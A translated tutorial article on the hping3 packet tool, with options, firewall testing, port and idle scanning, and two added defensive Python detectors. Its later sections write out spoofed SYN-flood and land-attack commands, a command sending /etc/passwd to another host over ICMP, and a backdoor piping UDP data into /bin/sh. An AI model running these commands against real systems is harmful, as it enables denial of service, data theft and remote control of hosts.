
What is the use of the hping3 command in Linux

2025-04-03 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)06/01 Report--

This article explains in detail what the hping3 command in Linux is used for. The editor thinks it is very practical, so it is shared here for reference. I hope you get something out of reading it.

The common Linux command hping is an open source tool for generating and parsing TCP/IP packets. Its creator is Salvatore Sanfilippo. The latest version is hping3, which can also be driven from Tcl scripts through its API.

Hping3 tests the security of networks and hosts

Note that hping is a standard tool for security auditing, firewall testing and similar work. Its advantage is that every part of the packet can be customized, so users can probe the target machine flexibly and in detail.

Installation:

yum install libpcap-devel tcl-devel
ln -s /usr/include/pcap-bpf.h /usr/include/net/bpf.h
wget http://www.hping.org/hping3-20051105.tar.gz
tar zxvf hping3-20051105.tar.gz
cd hping3-20051105
./configure
make
make install

Options:

-h --help: display help.
-v --version: version information.
-c --count count: number of packets to send (the countreached_timeout can be edited in hping2.h).
-i --interval: time between sent packets; the default is 1 second. This matters when raising the send rate and is also used in idle/spoofing scans; see hping-howto for more. --fast sends 10 packets per second.
-n --numeric: numeric output; host addresses are printed as numbers rather than names.
-q --quiet: quiet output.
-I --interface: interface name, for example eth0.
-V --verbose: print a lot of information. A TCP response generally looks like:
len=46 ip=192.168.1.1 flags=RADF seq=0 ttl=255 id=0 win=0 rtt=0.4ms tos=0 iplen=40 seq=0 ack=1380893504 sum=2010 urp=0
-D --debug: debug mode. When hping behaves unexpectedly, this mode shows what it is doing (interface detection, data link layer access, interface settings, ...).
-z --bind: bind the Ctrl+Z keyboard shortcut.
-Z --unbind: remove the keyboard shortcut.
-0 --rawip: RAW IP mode, in which hping sends IP headers followed by data.
-1 --icmp: ICMP mode. By default hping sends an ICMP echo request; use --icmptype and --icmpcode to send ICMP messages of other types and codes.
-2 --udp: UDP mode. By default hping sends UDP packets to port 0 of the host; change this with --baseport, --destport and --keep.
-9 --listen signature: listen mode, in which hping receives packets carrying the given signature.
-a --spoof hostname: spoof the source address. The firewall will not log your real IP, and of course you will not receive the reply packets either.
-t --ttl: set the TTL of the packets sent.
-H --ipproto: choose the IP protocol in RAW IP mode.
-W --winid: UNIX and Windows order the IP ID field differently; this option makes hping read the ID the way Windows does.
-r --rel: print the ID field relative to the previous reply, so the increments show directly in the output. See HPING-HOWTO for more.
-f --frag: fragment the packets, to test how the other side handles fragments. The default "virtual mtu" is 16 bytes.
-x --morefrag: set the "more fragments" flag. A stream of such fragments can keep the host busy reassembling them, resulting in denial of service.
-y --dontfrag: set the "don't fragment" flag, useful for learning more about path MTU discovery.
-g --fragoff offset: set the fragment offset.
-m --mtu value: set the virtual MTU. With this option the ID values become very large (around 50000, compared with roughly 3000-20000 when it is not given).
-G --rroute: record route. Shows detailed route data for up to 9 hops, even if the host blocks ICMP messages.
-C --icmptype type: ICMP type; the default is ICMP echo request.
-K --icmpcode code: ICMP code; the default is 0.
--icmp-ipver: set the IP version in the IP header carried inside the ICMP message.
--icmp-iphlen: set that IP header's length; the default is 5 (32-bit words).
--icmp-iplen: set the IP packet length.
--icmp-ipid: set the ID of the IP header inside the ICMP message; the default is random.
--icmp-ipproto: set the protocol; the default is TCP.
--icmp-cksum: set the checksum.
--icmp-ts: alias for --icmptype 13 (send ICMP timestamp requests).
--icmp-addr: alias for --icmptype 17 (send ICMP address mask requests).
-s --baseport source_port: hping matches reply packets by source port. It starts from a base port and adds 1 for each packet; you can set the base port yourself.
-p --destport [+][+]port: destination port; the default is 0. A single plus sign increases the destination port for each reply received; two plus signs increase it for each packet sent.
-k --keep: keep the source port fixed (see --baseport above).
-w --win: TCP window size; the default is 64 bytes.
-O --tcpoff: set a fake TCP data offset. The normal data offset is tcphdrlen / 4.
-M --setseq: set the TCP sequence number.
-L --setack: set the TCP ack number.
-Q --seqnum: show only TCP sequence numbers, which is useful for analysing how the target generates them.

Hping3 functions

Hping3 mainly has the following typical uses:

# Firewall testing

Hping3 lets you set the individual fields of a packet, so a firewall can be tested in detail. For more examples see: http://0daysecurity.com/articles/hping3_examples.html

You can test how the firewall responds to ICMP packets, whether it allows traceroute, whether a given port is open, and how it holds up under a denial of service (DoS) attack. For example, test the target firewall with a land attack (a land attack sets the source address equal to the destination address, tricking the target into trying to connect to itself over and over):

hping3 -S -c 1000000 -a 10.10.10.10 -p 21 10.10.10.1

# Port scan

Hping3 can also scan the target's ports. It lets you specify the TCP flags, length and other fields. The following example checks whether port 80 of the target machine is open:

hping3 -I eth0 -S 192.168.10.1 -p 80

Here -I eth0 selects the eth0 interface, -S sets the SYN flag of the TCP packet, and -p 80 specifies the destination port to probe.

Hping3 supports a wide range of port probing methods, almost all the scan types nmap has (except connect scan: hping3 only sends and receives packets and does not maintain a connection, so connect probing is not supported). Hping3 also gives finer control over the probes it sends, which makes it easy to fine-tune the results. Of course, hping3's port scanning performance and overall processing power cannot compare with nmap's, so it is generally used to scan only a few ports on a few hosts.

# Idle scanning

Idle scanning is a way to scan a remote host anonymously. It was also invented by Salvatore Sanfilippo, the author of hping3, and is implemented in Nmap as well.

The scanning principle is to find an idle host (a host with no network traffic of its own, whose IP ID increases by one per packet). The scanning host first sends a probe packet to the idle host and reads the IP ID from the reply. It then sends a SYN packet (assumed here; other probes are possible) to the port of the remote host with the source address forged as the idle host's address. If that port is open, the remote host replies with SYN/ACK, and the idle host answers the unexpected SYN/ACK with a RST, consuming one IP ID. The scanning host then probes the idle host again and reads its IP ID. Comparing the two IP ID values shows whether the idle host sent a packet in between, which indirectly reveals the port state.
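Idle scanning only works when the idle host's IP IDs are predictable. The following added example (not code from the original article or from hping3) classifies a sample of IP IDs observed in a host's replies, so a defender can check whether one of their own hosts could serve as a zombie; the `max_step` limit and the category names are assumptions made for this example.

```python
# Added example (not from the original article): classify a host's IP ID
# behaviour from a sample of IP IDs observed in its replies, the property idle
# scanning depends on. Run this against your own hosts: an "incremental"
# verdict means the host could serve as an idle-scan zombie and should get
# randomised IP IDs (or be firewalled from untrusted probes).
MAX_ID = 0x10000  # the IP ID field is 16 bits, so differences wrap modulo 65536


def ipid_deltas(ids):
    """Forward differences between consecutive IP IDs, modulo 2^16."""
    return [(b - a) % MAX_ID for a, b in zip(ids, ids[1:])]


def classify_ipid(ids, max_step=8):
    """Return 'zero', 'incremental', 'incremental-winid', 'busy' or 'random'.

    ids      -- IP IDs in the order the replies arrived (at least 3 samples)
    max_step -- largest per-packet increment still treated as "idle" (assumed)
    """
    if len(ids) < 3:
        raise ValueError("need at least 3 samples")
    if all(i == 0 for i in ids):
        return "zero"  # e.g. a stack that sends ID 0: nothing for a scanner to read
    deltas = ipid_deltas(ids)
    # Some Windows stacks increment the ID in host byte order, which shows up
    # as steps of 256 on the wire (what hping3's -W/--winid option corrects for).
    if all(d % 256 == 0 and 0 < d <= 256 * max_step for d in deltas):
        return "incremental-winid"
    if all(0 < d <= max_step for d in deltas):
        return "incremental"  # predictable: usable as an idle-scan zombie
    if all(0 < d < MAX_ID // 2 for d in deltas):
        return "busy"  # still counting up, but the host is talking to others
    return "random"  # unpredictable IDs: idle scanning cannot use this host


def zombie_candidate(ids, max_step=8):
    """True when the sampled IDs are predictable enough for idle scanning."""
    return classify_ipid(ids, max_step).startswith("incremental")
```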

# Denial of service attacks

Hping3 makes it easy to build denial of service attacks. For example, to open a large number of SYN connections to the target with the source address spoofed as 192.168.10.99, sending a SYN packet every 1000 microseconds:

hping3 -I eth0 -a 192.168.10.99 -S 192.168.10.33 -p 80 -i u1000

Other attacks such as smurf, teardrop and land are just as easy to build.

# File transfer

Hping3 supports file transfer over TCP, UDP or ICMP packets, which amounts to building a covert tunnel on those packets. It works by opening a listening port and parsing the contents of received packets that carry a signature (a string chosen by the user). Start the service on the receiving end:

hping3 192.168.1.159 --listen signature --safe --icmp

This listens for the signature in ICMP packets and reassembles the file contents that follow it.

On the sending side, send the file in signed ICMP packets:

hping3 192.168.1.108 --icmp -d 100 --sign signature --file /etc/passwd

This sends the /etc/passwd password file to the 192.168.10.44 host in ICMP packets. The packet data size is 100 bytes (-d 100) and the signature is "signature" (--sign signature).

# Trojan function

If hping3 can be started on a remote host, it can be used as a Trojan: it listens on a port and, once data arrives, pipes it into a shell, similar to the backdoor function of netcat.

Example: listen on local UDP port 53 (the DNS port) for packets from host 192.168.10.66 that carry the signature "signature", and pass the received data to /bin/sh for execution.

On the Trojan (listening) end:

hping3 192.168.10.66 --listen signature --safe --udp -p 53 | /bin/sh

On the remote control side:

echo ls > test.cmd
hping3 192.168.10.44 -p 53 -d 100 --udp --sign signature --file ./test.cmd

This sends the file containing the ls command, with the signature "signature", to UDP port 53 of host 192.168.10.44; the packet data length is 100 bytes.

Of course, this is just a simple demonstration; in a real scenario the controlling side can use the shell to perform many advanced and complex operations.
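Both the ICMP file transfer and the UDP backdoor above rely on a fixed signature string at the front of the packet data. The following added example (not code from the original article or from hping3) is a small detector for that pattern: it parses constructed ICMP echo packets, verifies their checksum, and flags payloads that start with a known marker or look like text; the payload check itself applies equally to UDP datagram data. The marker list, the printable-ratio cutoff and the sample packets are assumptions made for this example.

```python
# Added example (not from the original article): detector for the hping3-style
# signature channel, where --sign puts a marker string at the start of the packet
# data and --file fills the rest with file contents. Parses raw ICMP echo packets
# (constructed here, no network access); the payload check also applies to UDP
# data such as the "ls" command of the backdoor example. Markers are assumed.
import struct

def icmp_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum over the ICMP header plus payload."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF

def build_echo(payload: bytes, ident=0x1234, seq=1) -> bytes:
    """Constructed ICMP echo request (type 8) carrying payload; test input only."""
    header = struct.pack("!BBHHH", 8, 0, 0, ident, seq)
    return struct.pack("!BBHHH", 8, 0, icmp_checksum(header + payload), ident, seq) + payload

def parse_echo(pkt: bytes):
    """Return (type, ident, seq, payload), or None if not a valid echo packet."""
    if len(pkt) < 8 or icmp_checksum(pkt) != 0:  # a valid packet sums to zero
        return None
    typ, code, _csum, ident, seq = struct.unpack("!BBHHH", pkt[:8])
    if typ not in (0, 8) or code != 0:
        return None
    return typ, ident, seq, pkt[8:]

def suspicious_payload(payload: bytes, markers=(b"signature",), min_len=16):
    """Reason string when the payload looks like a signature channel, else None."""
    if any(payload.startswith(m) for m in markers):
        return "known signature"
    if len(payload) >= min_len:  # ping filler is mostly binary; files are text
        text = sum(32 <= b < 127 or b in (9, 10, 13) for b in payload)
        if text / len(payload) > 0.9:
            return "text-like payload"
    return None

def scan_echo_packets(pkts, **kw):
    """(seq, reason) for every parsable echo packet that trips the check."""
    hits = []
    for pkt in pkts:
        parsed = parse_echo(pkt)
        reason = parsed and suspicious_payload(parsed[3], **kw)
        if reason:
            hits.append((parsed[2], reason))
    return hits
```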

This is the end of the article on "what is the use of the hping3 command in Linux?". I hope the above content has been of some help to you and that you have learned something. If you think the article is good, please share it so more people can see it.
